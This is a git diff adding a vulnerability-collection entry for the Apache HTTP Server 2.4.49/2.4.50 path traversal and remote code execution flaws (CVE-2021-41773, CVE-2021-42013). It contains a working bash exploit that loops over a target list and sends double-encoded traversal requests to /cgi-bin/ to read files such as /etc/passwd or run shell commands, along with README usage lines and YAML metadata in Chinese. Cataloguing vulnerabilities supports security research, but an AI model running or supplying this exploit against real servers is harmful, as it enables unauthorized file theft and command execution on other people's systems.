diff --git a/cve/apache/2021/CVE-2021-42013/PoC.sh b/cve/apache/2021/CVE-2021-42013/PoC.sh
new file mode 100644
index 0000000000000000000000000000000000000000..cf5cfe12d54aa68d717df1c174322b03ffd8e2fc
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-42013/PoC.sh
@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Exploit: Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
+# Date: 10/05/2021
+# Exploit Author: Lucas Souza https://lsass.io
+# Vendor Homepage:  https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773, CVE-2021-42013
+# Credits: Ash Daulton and the cPanel Security Team
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+echo ./PoC.sh targets.txt /bin/sh id
+
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done
diff --git a/cve/apache/2021/CVE-2021-42013/README.md b/cve/apache/2021/CVE-2021-42013/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..6aa6f65a68a4b3e744503eeb9b560b51bce35581
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-42013/README.md
@@ -0,0 +1,18 @@
+<img src="./apache.png" width="60%">
+
+## Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
+##### Exploit Author: Lucas Souza https://lsass.io
+##### Vendor Homepage:  https://apache.org/
+##### Version: 2.4.49, 2.4.50
+##### Tested on: 2.4.49, 2.4.50
+##### CVE : CVE-2021-41773, CVE-2021-42013
+##### Credits: Ash Daulton and the cPanel Security Team
+
+
+
+
+#### Usage 
+
+     ./PoC.sh targets.txt /etc/passwd
+  
+     ./PoC.sh targets.txt /bin/sh "id"
diff --git a/cve/apache/2021/CVE-2021-42013/apache.png b/cve/apache/2021/CVE-2021-42013/apache.png
new file mode 100644
index 0000000000000000000000000000000000000000..d4b2ad27bdf0174310f99ffd299deb459acc17d6
Binary files /dev/null and b/cve/apache/2021/CVE-2021-42013/apache.png differ
diff --git a/cve/apache/2021/yaml/KVE-2022-0206.yaml b/cve/apache/2021/yaml/CVE-2021-41773.yaml
similarity index 100%
rename from cve/apache/2021/yaml/KVE-2022-0206.yaml
rename to cve/apache/2021/yaml/CVE-2021-41773.yaml
diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache/2021/yaml/CVE-2021-42013.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..25ad632212517b6cbcc0d219896e7dbee9fa5ad3
--- /dev/null
+++ b/cve/apache/2021/yaml/CVE-2021-42013.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-42013
+source: https://github.com/Ls4ss/CVE-2021-41773_CVE-2021-42013
+info:
+  name: Apache HTTP Server（简称 Apache）是开源的 Web 服务器，可以在大多数计算机操作系统中运行，由于其多平台和安全性被广泛使用，是最流行的 Web 服务器端软件之一。它快速、可靠并且可通过简单的 API 扩展，将 Perl/Python 等解释器编译到服务器中。
+  severity: critical
+  description: |
+    Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善，攻击者可利用该漏洞绕过修复补丁，并利用目录穿越攻击访问服务器中一些文件，进而造成敏感信息泄露。若httpd中开启CGI功能，攻击者可以构造恶意请求，造成远程代码执行。
+  scope-of-influence:
+    Apache HTTP = 2.4.49, Apache HTTP = 2.4.50
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42013
+    - https://httpd.apache.org/security/vulnerabilities_24.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-42013
+    cwe-id: CWE-22
+    cnvd-id: None
+    kve-id: None
+  tags: cve2021,Apache,目录遍历,RCE
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index fda618d64e897264be9f2a4adb7a959084404865..276c1b8677532aa5c0e04a044b8026ab222caea0 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -3,6 +3,7 @@ cve:
   apache:
     - CVE-2020-9490
     - CVE-2021-41773
+    - CVE-2021-42013
   linux-kernel:
     - CVE-2021-22555
     - CVE-2022-34918